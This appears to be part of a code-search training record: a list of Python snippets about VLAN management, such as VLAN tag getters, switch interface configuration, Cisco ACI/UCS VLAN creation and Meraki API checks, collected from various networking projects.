"def parent_cluster_resource_id(self) -> pulumi.Output[Optional[str]]:\n return pulumi.get(self, \"parent_cluster_resource_id\")",
"def storage_resource_id(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"storage_resource_id\")",
"def getMcc3Id(self):\n return self._base.getMcc3Id()",
"def id(self): \n if self.cloudnet:\n return self.cloudnet.id\n else:\n return None",
"def resource_group_id(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"resource_group_id\")",
"def resource_group_id(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"resource_group_id\")",
"def resource_group_id(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"resource_group_id\")",
"def resource_group_id(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"resource_group_id\")",
"def resource_group_id(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"resource_group_id\")",
"def resource_group_id(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"resource_group_id\")",
"def resource_group_id(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"resource_group_id\")",
"def resource_group_id(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"resource_group_id\")",
"def namespace_id(self) -> str:\n return pulumi.get(self, \"namespace_id\")",
"def database_id(self) -> str:\n return pulumi.get(self, \"database_id\")",
"def config_rule_id(self) -> str:\n return pulumi.get(self, \"config_rule_id\")",
"def config_rule_id(self) -> str:\n return pulumi.get(self, \"config_rule_id\")",
"def config_rule_id(self) -> str:\n return pulumi.get(self, \"config_rule_id\")",
"def config_rule_id(self) -> str:\n return pulumi.get(self, \"config_rule_id\")",
"def slb_id(self) -> str:\n return pulumi.get(self, \"slb_id\")",
"def target_resource_id(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"target_resource_id\")",
"def target_resource_id(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"target_resource_id\")",
"def cal_guid(self):\n return 'setup' + str(self.id) + '@lnldb'",
"def id(self) -> str:\n\n return self._inst.query('*IDN?')",
"def unique_id(self) -> str:\n return pulumi.get(self, \"unique_id\")",
"def get_id(self):\n if not self.nccl_id:\n logger.warning(\"The NCCL ID has not been \"\n \"set yet for store {}.\".format(self.name))\n return self.nccl_id"
] | [
"0.82438326",
"0.639748",
"0.639748",
"0.639748",
"0.6284943",
"0.6265004",
"0.62123185",
"0.617114",
"0.617114",
"0.617114",
"0.617114",
"0.617114",
"0.6158674",
"0.60937095",
"0.60937095",
"0.6091811",
"0.6091811",
"0.6091811",
"0.60563904",
"0.60457486",
"0.5990473",
"0.5979375",
"0.59711367",
"0.5962884",
"0.5938235",
"0.59169245",
"0.59169245",
"0.59169245",
"0.59169245",
"0.59169245",
"0.59169245",
"0.59169245",
"0.59169245",
"0.59169245",
"0.59169245",
"0.5891642",
"0.58725715",
"0.5865841",
"0.5865841",
"0.58452266",
"0.5840752",
"0.5840752",
"0.5840752",
"0.5840752",
"0.5840752",
"0.5840752",
"0.5840752",
"0.5840752",
"0.5840752",
"0.57935536",
"0.57935536",
"0.5793322",
"0.5793322",
"0.5785437",
"0.5774641",
"0.5774483",
"0.57647943",
"0.5748912",
"0.57442796",
"0.5741626",
"0.5724627",
"0.5717584",
"0.5717369",
"0.5704724",
"0.5704724",
"0.5704724",
"0.57012415",
"0.56968486",
"0.56968486",
"0.56968486",
"0.56968486",
"0.56968486",
"0.56872606",
"0.56858325",
"0.5676404",
"0.5668158",
"0.5667462",
"0.5666045",
"0.56643575",
"0.5661761",
"0.5661761",
"0.5661761",
"0.5661761",
"0.5661761",
"0.5661761",
"0.5661761",
"0.5661761",
"0.56503826",
"0.56264055",
"0.5621662",
"0.5621662",
"0.5621662",
"0.5621662",
"0.5621106",
"0.5614265",
"0.5614265",
"0.56135184",
"0.56134295",
"0.5609916",
"0.56079584"
] | 0.8125011 | 1 |
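Editor's note on the pattern documented by the record above: the `l3_isolation_domain_id` getter is the standard shape of Pulumi's generated Azure Native args classes, where each wire property is exposed through a `pulumi.getter`-decorated property backed by `pulumi.set`/`pulumi.get`. A minimal hand-written sketch of that pattern follows; the class name `ExampleNetworkArgs` is illustrative and not part of the dataset.

    import pulumi

    @pulumi.input_type
    class ExampleNetworkArgs:
        def __init__(__self__, *, l3_isolation_domain_id: pulumi.Input[str]):
            # Store the required input under its snake_case key.
            pulumi.set(__self__, "l3_isolation_domain_id", l3_isolation_domain_id)

        @property
        @pulumi.getter(name="l3IsolationDomainId")
        def l3_isolation_domain_id(self) -> pulumi.Input[str]:
            # Read the stored value back; the getter name maps to the camelCase wire name.
            return pulumi.get(self, "l3_isolation_domain_id")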
The name of the resource group. The name is case insensitive. | def resource_group_name(self) -> pulumi.Input[str]:
return pulumi.get(self, "resource_group_name") | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def resource_group_name(self) -> str:\n return pulumi.get(self, \"resource_group_name\")",
"def group_name(self) -> str:\n return pulumi.get(self, \"group_name\")",
"def resource_group_name(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"resource_group_name\")",
"def resource_group_name(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"resource_group_name\")",
"def resource_group_name(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"resource_group_name\")",
"def resource_group_name(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"resource_group_name\")",
"def resource_group_name(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"resource_group_name\")",
"def resource_group_name(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"resource_group_name\")",
"def resource_group_name(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"resource_group_name\")",
"def resource_group_name(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"resource_group_name\")",
"def resource_group_name(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"resource_group_name\")",
"def resource_group_name(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"resource_group_name\")",
"def resource_group_name(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"resource_group_name\")",
"def resource_group_name(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"resource_group_name\")",
"def get_resource_group_name(self):\n return self.instance_metadata.resource_group_name",
"def resource_group_name(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"resource_group_name\")",
"def resource_group_name(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"resource_group_name\")",
"def resource_group_name(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"resource_group_name\")",
"def resource_group_name(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"resource_group_name\")",
"def resource_group_name(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"resource_group_name\")",
"def resource_group_name(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"resource_group_name\")",
"def resource_group_name(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"resource_group_name\")",
"def resource_group_name(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"resource_group_name\")",
"def resource_group_name(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"resource_group_name\")",
"def resource_group_name(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"resource_group_name\")",
"def resource_group_name(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"resource_group_name\")",
"def resource_group_name(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"resource_group_name\")",
"def resource_group_name(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"resource_group_name\")",
"def resource_group_name(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"resource_group_name\")",
"def resource_group_name(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"resource_group_name\")",
"def group_name(self):\n\n return self._group_name",
"def get_group_name(self):\n return self.groupname",
"def resource_group(self) -> str:\n return pulumi.get(self, \"resource_group\")",
"def get_resource_group_name(resource_id):\n match_groups = re.match(r\".*resourcegroups/(?P<group_name>[^/]*)/.*\", resource_id, flags=re.IGNORECASE)\n return match_groups.group(\"group_name\")",
"def name(self):\n return f\"{self._group.friendly_name} {GROUP_SUFFIX}\"",
"def get_resource_group_name(self) -> str:\n # read the original value passed by the command\n resource_group_name = self.raw_param.get(\"resource_group_name\")\n\n # this parameter does not need dynamic completion\n # this parameter does not need validation\n return resource_group_name",
"def getName(self):\n return _libsbml.Group_getName(self)",
"def group_name(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"group_name\")",
"def group_name(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"group_name\")",
"def group_name(self) -> pulumi.Output[Optional[str]]:\n return pulumi.get(self, \"group_name\")",
"def resource_group(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"resource_group\")",
"def resource_group(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"resource_group\")",
"def getGroupName(Id):\r\n return \"Group name\"",
"def subnet_group_name(self) -> str:\n return pulumi.get(self, \"subnet_group_name\")",
"def group(self) -> str:\n return pulumi.get(self, \"group\")",
"def ad_group_name(self):\n\n return self._ad_group_name",
"def ad_group_name(self):\n\n return self._ad_group_name",
"def parameter_group_name(self) -> str:\n return pulumi.get(self, \"parameter_group_name\")",
"def server_group_name(self) -> str:\n return pulumi.get(self, \"server_group_name\")",
"def subnet_group_name(self) -> Optional[str]:\n return pulumi.get(self, \"subnet_group_name\")",
"def resource_group(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"resource_group\")",
"def log_group_name(self) -> str:\n return jsii.get(self, \"logGroupName\")",
"def log_group_name(self) -> str:\n return jsii.get(self, \"logGroupName\")",
"def group(self) -> Optional[str]:\n return pulumi.get(self, \"group\")",
"def subnet_group_name(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"subnet_group_name\")",
"def _group_name(cls, group=None):\n suffix = f\"{cls.__module__}.{cls.__qualname__}\"\n if group is not None:\n suffix += \"-\" + group\n\n # Wrap the suffix into SHA256 to guarantee that the length of\n # the group name is limited. Otherwise Channels will complain\n # about that the group name is wrong (actually is too long).\n suffix_sha256 = hashlib.sha256()\n suffix_sha256.update(suffix.encode(\"utf-8\"))\n\n return f\"{GraphqlWsConsumer.group_name_prefix}-{suffix_sha256.hexdigest()}\"",
"def get_group_name(name: str) -> str:\n if is_shortcut_name(name):\n return name.split(config.name_separator)[0]\n raise CHCShortCutNameError(name)",
"def subnet_group_name(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"subnet_group_name\")",
"def subnet_group_name(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"subnet_group_name\")",
"def getName(self):\n return _libsbml.GroupsExtension_getName(self)",
"def get_security_group_short_name(self):\n return self.config['security_group']",
"def resource_group_id(self) -> str:\n return pulumi.get(self, \"resource_group_id\")",
"def resource_group_id(self) -> str:\n return pulumi.get(self, \"resource_group_id\")"
] | [
"0.8591477",
"0.8364604",
"0.8203347",
"0.8203347",
"0.8203347",
"0.8203347",
"0.8203347",
"0.8203347",
"0.8203347",
"0.8203347",
"0.8203347",
"0.8203347",
"0.8203347",
"0.8203347",
"0.81754756",
"0.8084906",
"0.8084906",
"0.8084906",
"0.8084906",
"0.8084906",
"0.8084906",
"0.8084906",
"0.8084906",
"0.8084906",
"0.8084906",
"0.8084906",
"0.8084906",
"0.8084906",
"0.8084906",
"0.8084906",
"0.80501395",
"0.7925756",
"0.79149616",
"0.7895402",
"0.78135264",
"0.7751866",
"0.76719135",
"0.76436806",
"0.76436806",
"0.7622679",
"0.75345165",
"0.75345165",
"0.75141597",
"0.74826163",
"0.7394228",
"0.7359348",
"0.7359348",
"0.7290963",
"0.7290442",
"0.7241512",
"0.72162044",
"0.7204304",
"0.7204304",
"0.7093726",
"0.70841795",
"0.70780027",
"0.7062088",
"0.7047625",
"0.7047625",
"0.7018684",
"0.7011551",
"0.6988667",
"0.6988667"
] | 0.80879456 | 52 |
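Editor's note: the `resource_group_name` input documented by the record above is supplied by callers when instantiating an Azure Native resource. A minimal usage sketch inside a Pulumi program's `__main__.py`; resource names and the `eastus` location are placeholders.

    import pulumi
    import pulumi_azure_native as azure_native

    # Create a resource group, then pass its name into a child resource.
    rg = azure_native.resources.ResourceGroup("example-rg", location="eastus")

    account = azure_native.storage.StorageAccount(
        "examplestorage",
        resource_group_name=rg.name,
        sku=azure_native.storage.SkuArgs(name="Standard_LRS"),
        kind="StorageV2",
        location=rg.location,
    )

    pulumi.export("storage_account_name", account.name)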
The VLAN from the l3IsolationDomain that is used for this network. | def vlan(self) -> pulumi.Input[float]:
return pulumi.get(self, "vlan") | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def vlan(self) :\n\t\ttry :\n\t\t\treturn self._vlan\n\t\texcept Exception as e:\n\t\t\traise e",
"def get_vlan_tag(self):\n\t\treturn call_sdk_function('PrlVirtNet_GetVlanTag', self.handle)",
"def get_vlan_tag(self):\n\t\treturn call_sdk_function('PrlSrvCfgNet_GetVlanTag', self.handle)",
"def vlan(self) -> pulumi.Output[float]:\n return pulumi.get(self, \"vlan\")",
"def get_vlan(self, vlan_id):\r\n return self.vlan.getObject(id=vlan_id, mask=DEFAULT_VLAN_MASK)",
"def VlanId(self):\n if self.force_auto_sync:\n self.get('VlanId')\n return self._VlanId",
"def multicast_vlan(self):\n if self.segment.multicast_vlan_policy == \"d\":\n return None\n elif self.segment.multicast_vlan_policy == \"e\":\n return self.segment.multicast_vlan\n else:\n return self.segment.profile.multicast_vlan",
"def vlanChoice(self):\r\n idx = self.m_shuffleSeq[self.m_Cnt]\r\n self._vlanChoice = self.m_vlanSeq[idx]\r\n self.m_Cnt = (self.m_Cnt + 1) % self._wrMaxLen\r\n return self._vlanChoice",
"def management_vlan(self):\n if self.segment.management_vlan_policy == \"d\":\n return None\n elif self.segment.management_vlan_policy == \"e\":\n return self.segment.management_vlan\n else:\n return self.segment.profile.management_vlan",
"def InnerVlanId(self):\n if self.force_auto_sync:\n self.get('InnerVlanId')\n return self._InnerVlanId",
"def FlowStatVlanId(self):\n\t\treturn self._get_attribute('flowStatVlanId')",
"def show_vlan(self, vlan=None):\n\n if vlan is not None and vlan in self.get_vlans_list():\n print self.vlans[vlan]\n else:\n for v in self.vlans:\n print self.vlans[v]",
"def show_vlan(self, vlan=None):\n\n if vlan is not None and vlan in self.get_vlans_list():\n print self.vlans[vlan]\n else:\n for v in self.vlans:\n print self.vlans[v]",
"def _extract_vlan(vlan):\n try:\n return re.match(r'vlan-(\\d+)', vlan).group(1)\n except:\n return None",
"def VlanPriority(self):\n if self.force_auto_sync:\n self.get('VlanPriority')\n return self._VlanPriority",
"def vlans(self):\n if self._vlans is None:\n self._vlans = self._show_vlan()\n\n return self._vlans",
"def FlowStatVlanPriority(self):\n\t\treturn self._get_attribute('flowStatVlanPriority')",
"def vlan_get(self, vlan_id):\n # return True/False\n raise NotImplementedError",
"def get_vlan_from_int(dev, int_name):\n return dev.get_interfaces()[int_name]",
"def show_vlan(self, vlan=None, vdc=None):\n for vdcname in vdc:\n print \"VDC: {}\".format(vdcname)\n if vlan is not None and vlan in self.vdcs[vdcname].get_vlans_list():\n print self.vdcs[vdcname].vlans[vlan]\n else:\n for v in self.vdcs[vdcname].vlans:\n print self.vdcs[vdcname].vlans[v]",
"def get_vnet_subnet_id(self) -> Union[str, None]:\n return self.agentpool_context.get_vnet_subnet_id()",
"def FlowAggregatedStatVlanId(self):\n\t\treturn self._get_attribute('flowAggregatedStatVlanId')",
"def build(cls, name, enc, networkcfg):\n static = (networkcfg[name] if name in networkcfg\n else networkcfg[networkcfg.default_section])\n vlan = VLAN(name, enc, static)\n if vlan.policy == 'untagged':\n return UntaggedPolicy(vlan)\n elif vlan.policy == 'tagged':\n return TaggedPolicy(vlan)\n elif vlan.policy == 'transit':\n return TransitPolicy(vlan)\n elif vlan.policy == 'ipmi':\n return IPMIPolicy(vlan)\n elif vlan.policy == 'puppet':\n raise RuntimeError(\n 'should never been called with \"puppet\" policy', vlan)\n raise ValueError(\n 'unknown network policy for VLAN {}'.format(vlan.name),\n vlan.policy)",
"def lan_address(self):\n return self._lan_address",
"def read_mac_address_vlan(self, vid: int) -> Macs:\n return self._current_dev_manager.read_mac_address_vlan(vid=vid)",
"def tempest_cinder_glance_swift_vlan(self):\n self.helper_cinder_glance_swift('vlan')",
"def get_switch_local_vlan_id(self, rpc_context, **kwargs):\n port_id = kwargs.get('port_id')\n host_name = kwargs.get('host_name')\n if self.rpc_handler is None:\n return\n context = {'port_id': str(port_id), 'host_name': str(host_name)}\n\n response = None\n try:\n response = self.rpc_handler.get_switch_local_vlan_id(context)\n except:\n pass\n return response",
"def virtual_network_subnet_id(self) -> pulumi.Output[Optional[str]]:\n return pulumi.get(self, \"virtual_network_subnet_id\")",
"def read_mac_address_vlan(self, vid: int) -> Macs:\n raise NotImplementedError",
"def set_vlan_tag(self, nVlanTag):\n\t\tcall_sdk_function('PrlVirtNet_SetVlanTag', self.handle, nVlanTag)",
"def vm_vlan_num_in(self, vm_vlan_num_in):\n\n self._vm_vlan_num_in = vm_vlan_num_in",
"def virtual_network_subnet_id(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"virtual_network_subnet_id\")",
"def virtual_network_subnet_id(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"virtual_network_subnet_id\")",
"def add_vlan(self, vlan):\n logger.info('adding vlan: %s' % vlan.name)\n data = self._add_common(vlan)\n logger.debug('vlan data: %s' % data)\n self.interface_data[vlan.name] = data\n if vlan.routes:\n self._add_routes(vlan.name, vlan.routes)",
"def vz0(self):\n return self.params['vz0']",
"def FlowAggregatedStatVlanPriority(self):\n\t\treturn self._get_attribute('flowAggregatedStatVlanPriority')",
"def read_port_vlan_info(self, port: int) -> Vlans:\n return self._current_dev_manager.read_port_vlan_info(port=port)",
"def get_ifvlan_index(self, ifvlan_id):\n index = -1\n for i in range(len(info_populator.InfoPopulator.IFVLAN_IDS)):\n if ifvlan_id == info_populator.InfoPopulator.IFVLAN_IDS[i]:\n index = i\n break\n else:\n self.fail(\n \"could not find the index of interface vlan: %s\" %\n ifvlan_id)\n\n return index",
"def _getvlanlistqos(self):\n self.activeL2 = []\n for _key, vals in self.activeDeltas.get('output', {}).get('vsw', {}).items():\n if self.hostname not in vals:\n continue\n if not self._started(vals):\n # This resource has not started yet. Continue.\n continue\n for key, vals1 in vals[self.hostname].items():\n self.activeL2.append({'destport': key,\n 'vlan': vals1.get('hasLabel', {}).get('value', ''),\n 'params': vals1.get('hasService', {})})",
"def lvad(self):\n return self._lvad",
"def lvad(self):\n return self._lvad",
"def lvad(self):\n return self._lvad",
"def cap_net_vlan_provisioning_ind(self, **kwargs):\n\n return self.api_request(self._get_method_fullname(\"cap_net_vlan_provisioning_ind\"), kwargs)",
"def set_vlan_interface(self, interface, vlan, vdc=None):\n\n assert isinstance(vlan, str)\n assert isinstance(interface, str)\n assert isinstance(vdc, list)\n\n self.logger.debug(\"Adding vlan {} on interface {} on {}\".format(vlan, interface, self.host))\n interface = interface.title()\n vlan_created = None\n\n if len(vdc) != 1:\n raise ValueError(\"Interface {} cannot exist in multiple vdcs {}\".format(interface, self.host))\n vdc = vdc[0]\n if not self.vdcs[vdc].check_interface(interface):\n raise ValueError(\n \"Interface {} does not exist in vdc {} on {}\".format(interface, vdc, self.host))\n if not self.vdcs[vdc].check_vlan(vlan):\n self.set_vlan(vlan)\n vlan_created = [vlan]\n\n self.switchto_vdc(vdc)\n\n commands = ['config t ; interface {}'.format(interface)]\n configured = False\n\n if not self.vdcs[vdc].check_interface_vlan(interface, vlan):\n if self.vdcs[vdc].interfaces[interface].switchport == 'access':\n commands.append('switchport access vlan {}'.format(vlan))\n elif self.vdcs[vdc].interfaces[interface].switchport == 'trunk':\n commands.append('switchport trunk allowed vlan add {}'.format(vlan))\n else:\n raise ValueError(\n \"Interface {} in vdc {} on {} is not access or trunk\".format(interface, self.current_vdc,\n self.host))\n else:\n configured = True\n\n if not configured:\n try:\n self._send_xml_cli(commands)\n except:\n exc_type, exc_value, exc_traceback = sys.exc_info()\n stacktrace = traceback.extract_tb(exc_traceback)\n self.logger.error(\"VLAN {} configuration for interface {} on {} failed\".format(vlan, interface, self.host))\n self.logger.debug(sys.exc_info())\n self.logger.debug(stacktrace)\n else:\n self.get_interfaces(vdc=vdc)\n\n return vlan_created",
"def _is_vlan_router_interface_supported(self):",
"def purchase_vlan(self, vlan_name, debug=False):\n vlan_name = {'VLanName': vlan_name}\n json_scheme = self.gen_def_json_scheme('SetPurchaseVLan', vlan_name)\n json_obj = self.call_method_post(method=\"SetPurchaseVLan\", json_scheme=json_scheme)\n if debug is True:\n self.logger.debug(json_obj)\n if json_obj['Success'] is False:\n raise Exception(\"Cannot purchase new vlan.\")\n vlan = Vlan()\n vlan.name = json_obj['Value']['Name']\n vlan.resource_id = json_obj['Value']['ResourceId']\n vlan.vlan_code = json_obj['Value']['VlanCode']\n return vlan",
"def ms_get_management_vlan(self):\n self.open_route('/configure/switch_settings', \"Switch\")\n textarea_value = page_utils.get_input_var_value(\n self.get_page(),\n var_id='node_group_management_vlan')\n return textarea_value",
"def virtual_network(self):\n return self.broker.virtual_network(**{\"VirtualNetworkMemberID\": self.VirtualNetworkMemberID})",
"def vnet_name(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"vnet_name\")",
"def is_provider_vlan(vlan_id):\n session = db.get_session()\n if (session.query(network_models_v2.ProviderNetwork).\n filter_by(network_type=const.NETWORK_TYPE_VLAN,\n segmentation_id=vlan_id).first()):\n return True",
"def _support_vlan_router_interfaces(self):\n pass",
"def validate_vlan(vlan_id, meraki_net):\n check_vlan = False\n vlan_name = \"\"\n api_uri = f\"/v0/networks/{meraki_net}/vlans/{vlan_id}\"\n data = get_meraki_api_data(api_uri)\n if data:\n check_vlan = True\n vlan_name = data[\"name\"].strip()\n else:\n check_vlan = False\n return check_vlan, vlan_name",
"def read_port_vlan_info(self, port: int) -> Vlans:\n raise NotImplementedError",
"def system_vlan_num_in(self, system_vlan_num_in):\n\n self._system_vlan_num_in = system_vlan_num_in",
"def _get_tunnel_vif(self):\n return self.__tunnel_vif",
"def list_vlans(self, datacenter=None, vlan_number=None, name=None,\r\n **kwargs):\r\n _filter = NestedDict(kwargs.get('filter') or {})\r\n\r\n if vlan_number:\r\n _filter['networkVlans']['vlanNumber'] = query_filter(vlan_number)\r\n\r\n if name:\r\n _filter['networkVlans']['name'] = query_filter(name)\r\n\r\n if datacenter:\r\n _filter['networkVlans']['primaryRouter']['datacenter']['name'] = \\\r\n query_filter(datacenter)\r\n\r\n kwargs['filter'] = _filter.to_dict()\r\n\r\n if 'mask' not in kwargs:\r\n kwargs['mask'] = DEFAULT_VLAN_MASK\r\n\r\n return self.account.getNetworkVlans(**kwargs)",
"def virtual_router_ip(self):\n return self._virtual_router_ip",
"def get_vlans():\n query = {\"type\": \"op\", \"cmd\": \"<show><vlan>all</vlan></show>\"}\n\n return __proxy__[\"panos.call\"](query)",
"def vm_vlan_num_lt(self, vm_vlan_num_lt):\n\n self._vm_vlan_num_lt = vm_vlan_num_lt",
"def vnet_name(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"vnet_name\")",
"def cap_voice_vlan_ind(self, **kwargs):\n\n return self.api_request(self._get_method_fullname(\"cap_voice_vlan_ind\"), kwargs)",
"def lan_address(self):\n _, port = self._socket.getsockname()\n return (\"127.0.0.1\", port)",
"def _get_vlist(self, vlist):\n if vlist == \"all\":\n return list(range(1, 4095))\n elif vlist == \"none\":\n return []\n elif type(vlist) is not list:\n raise Exception(\"Unexpected vlan list: \" + str(vlist))\n else:\n return vlist",
"def subnet_id(self) -> str:\n return pulumi.get(self, \"subnet_id\")",
"def cluster_subnet(self) -> str:\n return pulumi.get(self, \"cluster_subnet\")",
"def virtual_network_id(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"virtual_network_id\")",
"def VplsIdIpAddress(self):\n return self._get_attribute('vplsIdIpAddress')",
"def deploy_neutron_vlan(self):\n self.env.revert_snapshot(\"ready_with_3_slaves\")\n\n cluster_id = self.fuel_web.create_cluster(\n name=self.__class__.__name__,\n mode=DEPLOYMENT_MODE,\n settings={\n \"net_provider\": 'neutron',\n \"net_segment_type\": NEUTRON_SEGMENT['vlan'],\n 'tenant': 'simpleVlan',\n 'user': 'simpleVlan',\n 'password': 'simpleVlan'\n }\n )\n self.fuel_web.update_nodes(\n cluster_id,\n {\n 'slave-01': ['controller'],\n 'slave-02': ['compute'],\n 'slave-03': ['compute']\n }\n )\n self.fuel_web.deploy_cluster_wait(cluster_id)\n\n cluster = self.fuel_web.client.get_cluster(cluster_id)\n assert_equal(str(cluster['net_provider']), 'neutron')\n\n self.fuel_web.verify_network(cluster_id)\n\n self.fuel_web.run_ostf(\n cluster_id=cluster_id)\n\n self.env.make_snapshot(\"deploy_neutron_vlan\", is_make=True)",
"def subnet_id(self) -> Optional[str]:\n return pulumi.get(self, \"subnet_id\")",
"def get_virtual_network_id(self):\n\t\treturn call_sdk_function('PrlVmDevNet_GetVirtualNetworkId', self.handle)",
"def add_vlan(self, vlan_number, vlan_pool_name):\n class_query = ClassQuery('fvnsVlanInstP')\n class_query.propFilter = 'eq(fvnsVlanInstP.name, \"' + VLAN_POOL_PREFIX + vlan_pool_name + '\")'\n vp_list = self.moDir.query(class_query)\n # If the vlan pool does not exists, create it with the physical domain and the attachable entity profile\n if len(vp_list) == 0:\n VlanInstP_mo = self.create_vlan_pool(VLAN_POOL_PREFIX + vlan_pool_name, 'static')\n DomP_mo = self.create_physical_domain(PD_PREFIX + vlan_pool_name, str(VlanInstP_mo.dn))\n self.create_attachable_entity_profile(AEP_PREFIX + vlan_pool_name, str(DomP_mo.dn))\n else:\n VlanInstP_mo = vp_list[0]\n encap_mo = EncapBlk(str(VlanInstP_mo.dn), VLAN_PREFIX + str(vlan_number),\n VLAN_PREFIX + str(vlan_number), allocMode='static')\n self.commit(encap_mo)",
"def vnet_name(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"vnet_name\")",
"def l3_isolation_domain_id(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"l3_isolation_domain_id\")",
"def get_lane(self):\n return self.lane",
"def _get_l2vni(self):\n return self.__l2vni",
"def system_vlan_num_lt(self, system_vlan_num_lt):\n\n self._system_vlan_num_lt = system_vlan_num_lt",
"def _isVLAN(v):\n #if not v or not type(v) is (string): return 0\n v = v.replace(',','')\n v = v.replace('-','')\n for char in v:\n if re.compile('[0-9]+').match(char) == None:return 0\n return 1",
"def getlan():\n s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n try:\n s.connect(('10.255.255.255', 1))\n lan = str(s.getsockname()[0])\n s.close()\n except socket.error:\n s.close()\n sys.exit('>> Unable to find LAN IP')\n\n return lan",
"def _create_vlan(self, conn, vlan_id, vlan_name):\n\n req_js = {}\n req_js['vlan_id'] = vlan_id\n req_js['vlan_name'] = vlan_name\n req_js['admin_state'] = 'up'\n\n resp = conn.post(self.VLAN_REST_OBJ, req_js)\n self._check_process_resp(resp)",
"def get_vol_lvl(self):\n global volume\n #output = subprocess.check_output(['amixer', 'sget', self.mixer_name]).decode('utf-8')\n return volume#int(output[(output.find('[') + 1):output.find('%]', (output.find('[') + 1))])",
"def virtual_network_id(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"virtual_network_id\")",
"def lun(self) -> Optional[pulumi.Input[int]]:\n return pulumi.get(self, \"lun\")",
"def vat_number(self):\n return self._vat_number",
"def get_network_id(self):\n\t\treturn call_sdk_function('PrlVirtNet_GetNetworkId', self.handle)",
"def _get_ethernet_tag(self):\n return self.__ethernet_tag",
"def system_vlan_num(self, system_vlan_num):\n\n self._system_vlan_num = system_vlan_num",
"def l3_isolation_domain_id(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"l3_isolation_domain_id\")",
"def vm_vlan_num(self, vm_vlan_num):\n\n self._vm_vlan_num = vm_vlan_num",
"def common_values(self):\n vlan = self.vlan\n return dict(\n addr4=vlan.addrs(4),\n addr6=vlan.addrs(6),\n addresses=vlan.addrs(),\n gateways=vlan.gateways_filtered(),\n iface=vlan.iname(),\n mac=vlan.mac,\n metric=vlan.metric,\n mtu=vlan.mtu,\n nets4=vlan.nets(4),\n nets6=vlan.nets(6),\n nets=vlan.nets(),\n vlan=vlan.name,\n )",
"def __init__(self, vlan_id):\n self.vlan_id = vlan_id\n self.action_type = 'set_vlan'",
"def vlan_create(handle, name, vlan_id, sharing=\"none\",\r\n mcast_policy_name=\"\", compression_type=\"included\",\r\n default_net=\"no\", pub_nw_name=\"\", parent_dn=\"fabric/lan\"):\r\n from ucsmsdk.mometa.fabric.FabricVlan import FabricVlan\r\n\r\n obj = handle.query_dn(parent_dn)\r\n if obj:\r\n vlan = FabricVlan(parent_mo_or_dn=obj,\r\n sharing=sharing,\r\n name=name,\r\n id=vlan_id,\r\n mcast_policy_name=mcast_policy_name,\r\n policy_owner=\"local\",\r\n default_net=default_net,\r\n pub_nw_name=pub_nw_name,\r\n compression_type=compression_type)\r\n\r\n handle.add_mo(vlan, modify_present=True)\r\n handle.commit()\r\n else:\r\n log.info(parent_dn + \" MO is not available\")",
"def subnet_id(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"subnet_id\")",
"def subnet_id(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"subnet_id\")",
"def _tenant_network(self):\n port = self._connection.network.ports.find_by_device_owner('network:router_interface')\n if port:\n return self._connection.network.networks.get(port.network_id)\n else:\n raise errors.ImproperlyConfiguredError('Could not find tenancy network')",
